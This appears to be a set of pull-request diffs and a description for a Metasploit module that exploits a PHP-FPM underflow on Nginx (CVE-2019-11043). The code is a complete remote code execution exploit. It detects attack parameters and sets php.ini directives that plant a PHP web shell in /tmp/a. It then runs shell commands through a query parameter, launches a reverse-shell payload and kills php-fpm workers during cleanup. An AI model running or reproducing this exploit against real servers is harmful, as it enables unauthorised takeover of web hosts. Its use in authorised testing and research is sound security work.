+        check_cb: ->(res) { res.get_cookies =~ /PHPSESSID=/ }
+      ),
+      'output_handler.md5' => DetectMethod.new(
+        php_option_enable:  'output_handler=md5',
+        php_option_disable: 'output_handler=NULL',
+        check_cb: ->(res) { res.body.length == 16 }
+      )
+    }
+  end
+
+  def send_crafted_request(path:, qsl: datastore['MinQSL'], customh_length: 1, prefix: '', allow_retry: true)
+    uri = URI.encode(normalize_uri(target_uri.path, path)).gsub(/([?&])/, {'?'=>'%3F', '&'=>'%26'})
+    qsl_delta = uri.length - path.length - URI.encode(target_uri.path).length
+    if qsl_delta.odd?
+      fail_with Failure::Unknown, "Got odd qslDelta, that means the URL encoding gone wrong: path=#{path}, qsl_delta=#{qsl_delta}"
+    end
+    qsl_prime = qsl - qsl_delta/2 - prefix.length
+    if qsl_prime < 0
+      vprint_error("qsl value too small: qsl=#{qsl}, qsl_delta=#{qsl_delta}, prefix=#{prefix}")
+    end
+    uri = "#{uri}?#{prefix}#{'Q'*qsl_prime}"
+    opts = {
+      'method'  => 'GET',
+      'uri'     => uri,
+      'agent'   => 'Mozilla/5.0',
+      'headers' => {
+        'CustomH' => "x=#{Rex::Text.rand_text_alphanumeric(customh_length)}",
+        'Ebut'    => Rex::Text.rand_text_alphanumeric(11)
+      }
+    }
+    actual_timeout = datastore['HttpClientTimeout'] if datastore['HttpClientTimeout']&.> 0
+    actual_timeout ||= 20
+
+    connect(opts) if client.nil? || !client.conn?
+    # By default, try to reuse an existing connection (persist option).
+    res = client.send_recv(client.request_raw(opts), actual_timeout, true)
+    if res.nil? && allow_retry
+      # The server closed the connection, resend without 'persist', which forces
+      # reconnecting. This could happen if the connection is reused too much time.
+      # Nginx will automatically close a keepalive connection after 100 requests
+      # by default or whatever value is set by the 'keepalive_requests' option.
+      res = client.send_recv(client.request_raw(opts), actual_timeout)
+    end
+    res
+  end
+
+  def repeat_operation(op, opts={})
+    datastore['OperationMaxRetries'].times do |i|
+      vprint_status("#{op}: try ##{i+1}")
+      res = opts.empty? ? send(op) : send(op, opts)
+      return res if res
+    end
+    nil
+  end
+
+  def extend_qsl_list(qsl_candidates)
+    qsl_candidates.each_with_object([]) do |qsl, extended_qsl|
+      (0..datastore['MaxQSLDetectDelta']).step(datastore['QSLDetectStep']) do |delta|
+        extended_qsl << qsl - delta
+      end
+    end.sort.uniq
+  end
+
+  def sanity_check?
+    datastore['OperationMaxRetries'].times do
+      res = send_crafted_request(
+        path: "/PHP\nSOSAT",
+        qsl: datastore['MaxQSL'],
+        customh_length: datastore['MaxCustomHeaderLength']
+      )
+      unless res
+        vprint_error("Error during sanity check")
+        return false
+      end
+      if res.code != @base_status
+        vprint_error(
+          "Invalid status code: #{res.code} (must be #{@base_status}). "\
+          "Maybe \".php\" suffix is required?"
+        )
+        return false
+      end
+      detect_method = self.class.detect_methods[datastore['DetectMethod']]
+      if detect_method.php_option_enabled?(res)
+        vprint_error(
+          "Detection method '#{datastore['DetectMethod']}' won't work since "\
+          "the PHP option has already been set on the target. Try another one"
+        )
+        return false
+      end
+    end
+    return true
+  end
+
+  def set_php_setting(php_setting:, qsl:, customh_length:, query_string_prefix: '')
+    res = nil
+    path = "/PHP_VALUE\n#{php_setting}"
+    if path.length > datastore['PosOffset']
+      vprint_error("php.ini value is too long: #{php_value}")
+      return nil
+    end
+    path += ';' * (datastore['PosOffset'] - path.length)
+    res = send_crafted_request(
+      path: path,
+      qsl: qsl,
+      customh_length: customh_length,
+      prefix: query_string_prefix
+    )
+    unless res
+      vprint_error("error while setting #{php_setting} for qsl=#{qsl}, customh_length=#{customh_length}")
+    end
+    return res
+  end
+
+  def send_params_detection(qsl_candidates:, customh_length:, detect_method:)
+    php_setting = detect_method.php_option_enable
+    vprint_status("Iterating until the PHP option is enabled (#{php_setting})...")
+    qsl_candidates.product((1..customh_length).to_a) do |qsl, c_length|
+      res = set_php_setting(php_setting: php_setting, qsl: qsl, customh_length: c_length)
+      unless res
+        vprint_error("Error for qsl=#{qsl}, customh_length=#{c_length}")
+        return nil
+      end
+      if res.code != @base_status
+        vprint_status("Status code #{res.code} for qsl=#{qsl}, customh_length=#{c_length}")
+      end
+      if detect_method.php_option_enabled?(res)
+        php_setting = detect_method.php_option_disable
+        vprint_status("Attack params found, disabling PHP option (#{php_setting})...")
+        set_php_setting(php_setting: php_setting, qsl: qsl, customh_length: c_length)
+        return { qsl: qsl, customh_length: c_length }
+      end
+    end
+    return nil
+  end
+
+  def detect_params(qsl_candidates)
+    if datastore['CustomHeaderLengthHint']
+      vprint_status(
+        "Using custom header length hint for max length (customh_length="\
+        "#{datastore['CustomHeaderLengthHint']})")
+      customh_length = datastore['CustomHeaderLengthHint']
+    else
+      customh_length = datastore['MaxCustomHeaderLength']
+    end
+    detect_method = self.class.detect_methods[datastore['DetectMethod']]
+    return repeat_operation(
+      :send_params_detection,
+      qsl_candidates: qsl_candidates,
+      customh_length: customh_length,
+      detect_method: detect_method
+    )
+  end
+
+  def send_attack_chain
+    [
+      "short_open_tag=1",
+      "html_errors=0",
+      "include_path=/tmp",
+      "auto_prepend_file=a",
+      "log_errors=1",
+      "error_reporting=2",
+      "error_log=/tmp/a",
+      "extension_dir=\"<?=`\"",
+      "extension=\"$_GET[a]`?>\""
+    ].each do |php_setting|
+      vprint_status("Sending php.ini setting: #{php_setting}")
+      res = set_php_setting(
+        php_setting: php_setting,
+        qsl: @params[:qsl],
+        customh_length: @params[:customh_length],
+        query_string_prefix: "a=/bin/sh+-c+'#{CHECK_COMMAND}'%26"
+      )
+      if res
+        return res if res.body.include?(SUCCESS_PATTERN)
+      else
+        print_error("Error when setting #{php_setting}") unless re
+        return nil
+      end
+    end
+    return nil
+  end
+
+  def send_payload
+    disconnect(client) if client&.conn?
+    res = send_crafted_request(
+      path: '/',
+      qsl: @params[:qsl],
+      customh_length: @params[:customh_length],
+      prefix: "a=#{payload.encoded}%26",
+      allow_retry: false
+    )
+    sleep(1)
+    return res if session_created?
+    return nil
+  end
+
+  def send_backdoor_cleanup
+    cleanup_command = ";echo '<?php echo `$_GET[a]`;return;?>'>/tmp/a"
+    res = send_crafted_request(
+      path: '/',
+      qsl: @params[:qsl],
+      customh_length: @params[:customh_length],
+      prefix: "a=#{URI.encode(cleanup_command)};#{CHECK_COMMAND}%26"
+    )
+    return res if res&.body.include?(SUCCESS_PATTERN)
+    return nil
+  end
+
+  def detect_qsl
+    qsl_candidates = []
+    if datastore['QSLHint']
+      vprint_status("Skipping qsl detection, using hint (qsl=#{datastore['QSLHint']})")
+      qsl_candidates << datastore['QSLHint']
+    else
+      (datastore['MinQSL']..datastore['MaxQSL']).step(datastore['QSLDetectStep']) do |qsl|
+        res = send_crafted_request(path: "/PHP\nabcdefghijklmopqrstuv.php", qsl: qsl)
+        unless res
+          vprint_error("Error when sending query with QSL=#{qsl}")
+          next
+        end
+        if res.code != @base_status
+          vprint_status("Status code #{res.code} for qsl=#{qsl}, adding as a candidate")
+          qsl_candidates << qsl
+        end
+      end
+    end
+    qsl_candidates
+  end
+
+  def check
+    print_status("Sending baseline query...")
+    res = send_crafted_request(path: "/path\ninfo.php")
+    return Exploit::CheckCode::Detected("Error when sending baseline query") unless res
+    @base_status = res.code
+    vprint_status("Base status code is #{@base_status}")
+
+    print_status("Detecting QSL...")
+    qsl_candidates = detect_qsl
+    if qsl_candidates.empty?
+      return Exploit::CheckCode::Detected("No qsl candidates found, invulnerable or something wrong")
+    end
+    if qsl_candidates.size > datastore['MaxQSLCandidates']
+      return Exploit::CheckCode::Detected("Too many qsl candidates found, looks like I got banned")
+    end
+
+    print_good("The target is probably vulnerable. Possible QSLs: #{qsl_candidates}")
+
+    qsl_candidates = extend_qsl_list(qsl_candidates)
+    vprint_status("Extended QSL list: #{qsl_candidates}")
+
+    print_status("Doing sanity check...")
+    return Exploit::CheckCode::Detected('Sanity check failed') unless sanity_check?
+
+    print_status("Detecting attack parameters...")
+    @params = detect_params(qsl_candidates)
+    return Exploit::CheckCode::Detected('Unable to detect parameters') unless @params
+
+    print_good("Parameters found: QSL=#{@params[:qsl]}, customh_length=#{@params[:customh_length]}")
+    print_good("Target is vulnerable!")
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+    end
+    if @params[:qsl].nil? || @params[:customh_length].nil?
+      fail_with Failure::NotVulnerable, 'Attack parameters not found'
+    end
+
+    print_status("Performing attack using php.ini settings...")
+    if repeat_operation(:send_attack_chain)
+      print_good("Success! Was able to execute a command by appending '#{CHECK_COMMAND}'")
+    else
+      fail_with Failure::Unknown, 'Failed to send the attack chain'
+    end
+
+    print_status("Trying to cleanup /tmp/a...")
+    if repeat_operation(:send_backdoor_cleanup)
+      print_good('Cleanup done!')
+    end
+
+    print_status("Sending payload...")
+    if repeat_operation(:send_payload)
+      print_good('Session created')
+    else
+      fail_with Failure::PayloadFailed, 'No session created'
+    end
+  end
+
+  def send_cleanup(cleanup_cmd:)
+    res = send_crafted_request(
+      path: '/',
+      qsl: @params[:qsl],
+      customh_length: @params[:customh_length],
+      prefix: "a=#{cleanup_cmd}%26"
+    )
+    return res if res && res.code != @base_status
+    return nil
+  end
+
+  def cleanup()
+    return unless successful
+    kill_workers = 'for p in `pidof php-fpm`; do kill -9 $p;done'
+    rm = 'rm -f /tmp/a'
+    cleanup_cmd = "#{CGI.escape(kill_workers)};#{CGI.escape(rm)}"
+    disconnect(client) if client&.conn?
+    print_status("Remove /tmp/a and kill workers...")
+    if repeat_operation(:send_cleanup, cleanup_cmd: cleanup_cmd)
+      print_good("Done!")
+    else
+      print_bad(
+        "Could not cleanup. Run these commands before terminating the session: "\
+        "#{kill_workers}; #{rm}"
+      )
+    end
+  end
+end

--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -220,7 +220,9 @@ class MetasploitModule < Msf::Exploit::Remote
     path = "/PHP_VALUE\n#{php_setting}"
     pos_offset = 34
     if path.length > pos_offset
-      vprint_error("php.ini value is too long: #{php_value}")
+      vprint_error(
+        "The path size (#{path.length} bytes) is larger than the allowed size "\
+        "(#{pos_offset} bytes). Choose a shorter php.ini value (current: '#{php_setting}')")
       return nil
     end
     path += ';' * (pos_offset - path.length)
@@ -315,7 +317,7 @@ class MetasploitModule < Msf::Exploit::Remote
       cmd: payload.encoded,
       allow_retry: false
     )
-    sleep(1)
+    Rex.sleep(1)
     return session_created? ? true : nil
   end
 
@@ -333,20 +335,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def detect_qsl
     qsl_candidates = []
-    if datastore['QSLHint']
-      vprint_status("Skipping qsl detection, using hint (qsl=#{datastore['QSLHint']})")
-      qsl_candidates << datastore['QSLHint']
-    else
-      (datastore['MinQSL']..datastore['MaxQSL']).step(datastore['QSLDetectStep']) do |qsl|
-        res = send_crafted_request(path: "/PHP\nabcdefghijklmopqrstuv.php", qsl: qsl)
-        unless res
-          vprint_error("Error when sending query with QSL=#{qsl}")
-          next
-        end
-        if res.code != @base_status
-          vprint_status("Status code #{res.code} for qsl=#{qsl}, adding as a candidate")
-          qsl_candidates << qsl
-        end
+    (datastore['MinQSL']..datastore['MaxQSL']).step(datastore['QSLDetectStep']) do |qsl|
+      res = send_crafted_request(path: "/PHP\nabcdefghijklmopqrstuv.php", qsl: qsl)
+      unless res
+        vprint_error("Error when sending query with QSL=#{qsl}")
+        next
+      end
+      if res.code != @base_status
+        vprint_status("Status code #{res.code} for qsl=#{qsl}, adding as a candidate")
+        qsl_candidates << qsl
       end
     end
     qsl_candidates
@@ -355,12 +352,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     print_status("Sending baseline query...")
     res = send_crafted_request(path: "/path\ninfo.php")
-    return Exploit::CheckCode::Detected("Error when sending baseline query") unless res
+    return Exploit::CheckCode::Unknown("Error when sending baseline query") unless res
     @base_status = res.code
     vprint_status("Base status code is #{@base_status}")
 
-    print_status("Detecting QSL...")
-    qsl_candidates = detect_qsl
+    if datastore['QSLHint']
+      print_status("Skipping qsl detection, using hint (qsl=#{datastore['QSLHint']})")
+      qsl_candidates = [datastore['QSLHint']]
+    else
+      print_status("Detecting QSL...")
+      qsl_candidates = detect_qsl
+    end
     if qsl_candidates.empty?
       return Exploit::CheckCode::Detected("No qsl candidates found, not vulnerable or something went wrong")
     end
@@ -424,7 +426,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil
   end
 
-  def cleanup()
+  def cleanup
     return unless successful
     kill_workers = 'for p in `pidof php-fpm`; do kill -9 $p;done'
     rm = "rm -f /tmp/#{@filename}"

--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -86,13 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptInt.new('MaxQSLDetectDelta', [true, 'Max query string length detection delta', 10]),
       OptInt.new('MaxCustomHeaderLength', [true, 'Max custom header length', 256]),
       OptInt.new('CustomHeaderLengthHint', [false, 'Custom header length hint']),
-      OptString.new('DetectMethod', [
-        true,
-        "Detection method (available methods: #{self.class.detect_methods.keys.join(', ')})",
-        'session.auto_start',
-        self.class.detect_methods.keys,
-        /(#{self.class.detect_methods.keys.join('|')})/
-      ]),
+      OptEnum.new('DetectMethod', [true, "Detection method", 'session.auto_start', self.class.detect_methods.keys]),
       OptInt.new('OperationMaxRetries', [true, 'Maximum of operation retries', 20])
     ])
     @filename = rand_text_alpha(1)
@@ -140,13 +134,12 @@ class MetasploitModule < Msf::Exploit::Remote
     prefix = cmd.empty? ? '' : "#{@http_param}=#{URI.encode(cmd)}%26"
     qsl_prime = qsl - qsl_delta/2 - prefix.length
     if qsl_prime < 0
-      vprint_error("qsl value too small: qsl=#{qsl}, qsl_delta=#{qsl_delta}, prefix=#{prefix}")
+      fail_with Failure::Unknown, "QSL value too small to fit the command: QSL=#{qsl}, qsl_delta=#{qsl_delta}, prefix (size=#{prefix.size})=#{prefix}"
     end
     uri = "#{uri}?#{prefix}#{'Q'*qsl_prime}"
     opts = {
       'method'  => 'GET',
       'uri'     => uri,
-      'agent'   => 'Mozilla/5.0',
       'headers' => {
         'CustomH' => "x=#{Rex::Text.rand_text_alphanumeric(customh_length)}",
         'Nuut'    => Rex::Text.rand_text_alphanumeric(11)
@@ -352,7 +345,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     print_status("Sending baseline query...")
     res = send_crafted_request(path: "/path\ninfo.php")
-    return Exploit::CheckCode::Unknown("Error when sending baseline query") unless res
+    return CheckCode::Unknown("Error when sending baseline query") unless res
     @base_status = res.code
     vprint_status("Base status code is #{@base_status}")
 
@@ -364,10 +357,10 @@ class MetasploitModule < Msf::Exploit::Remote
       qsl_candidates = detect_qsl
     end
     if qsl_candidates.empty?
-      return Exploit::CheckCode::Detected("No qsl candidates found, not vulnerable or something went wrong")
+      return CheckCode::Detected("No qsl candidates found, not vulnerable or something went wrong")
     end
     if qsl_candidates.size > datastore['MaxQSLCandidates']
-      return Exploit::CheckCode::Detected("Too many qsl candidates found, looks like I got banned")
+      return CheckCode::Detected("Too many qsl candidates found, looks like I got banned")
     end
 
     print_good("The target is probably vulnerable. Possible QSLs: #{qsl_candidates}")
@@ -376,19 +369,19 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Extended QSL list: #{qsl_candidates}")
 
     print_status("Doing sanity check...")
-    return Exploit::CheckCode::Detected('Sanity check failed') unless sanity_check?
+    return CheckCode::Detected('Sanity check failed') unless sanity_check?
 
     print_status("Detecting attack parameters...")
     @params = detect_params(qsl_candidates)
-    return Exploit::CheckCode::Detected('Unable to detect parameters') unless @params
+    return CheckCode::Detected('Unable to detect parameters') unless @params
 
     print_good("Parameters found: QSL=#{@params[:qsl]}, customh_length=#{@params[:customh_length]}")
     print_good("Target is vulnerable!")
-    Exploit::CheckCode::Vulnerable
+    CheckCode::Vulnerable
   end
 
   def exploit
-    unless check == Exploit::CheckCode::Vulnerable
+    unless check == CheckCode::Vulnerable
       fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
     end
     if @params[:qsl].nil? || @params[:customh_length].nil?
@@ -408,11 +401,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Sending payload...")
-    if repeat_operation(:send_payload)
-      print_good('Session created')
-    else
-      fail_with Failure::PayloadFailed, 'No session created'
-    end
+    repeat_operation(:send_payload)
   end
 
   def send_cleanup(cleanup_cmd:)


### PR DESCRIPTION
This module exploits an underflow vulnerability in versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on Nginx. Only servers with certains Nginx + PHP-FPM configurations are exploitable. This is a port of the original neex's exploit code (see refs.). First, it detects the correct parameters (Query String Length and custom header length) needed to trigger code execution. This step determines if the target is actually vulnerable (Check method). Then, the exploit sets a series of PHP INI directives to create a file (/tmp/a) locally on the target, which enables code execution through a query string parameter (?a=<cmd>). This is used to execute normal payload stagers. Finally, this module does some cleanup by killing local PHP-FPM workers (those are spawned automatically once killed) and removing the created local file (/tmp/a).


## Verification

  Preparing the target:

  1. `git clone https://github.com/neex/phuip-fpizdam`
  2. `cd phuip-fpizdam/reproducer/`
  3. `docker build -t reproduce-cve-2019-11043 .`
  4. `docker run --rm -p 192.168.6.6:8080:80 --name reproduce-cve-2019-11043 reproduce-cve-2019-11043`

  Running the exploit:

  1. `./msfconsole`
  2. `use exploit/multi/http/php_fpm_rce`
  4. `set RHOSTS 192.168.6.6`
  5. `set RPORT 8080`
  4. `set TARGETURI /script.php`
  6. `set PAYLOAD php/meterpreter/reverse_tcp`
  7. `set LHOST 192.168.6.6`
  8. `run`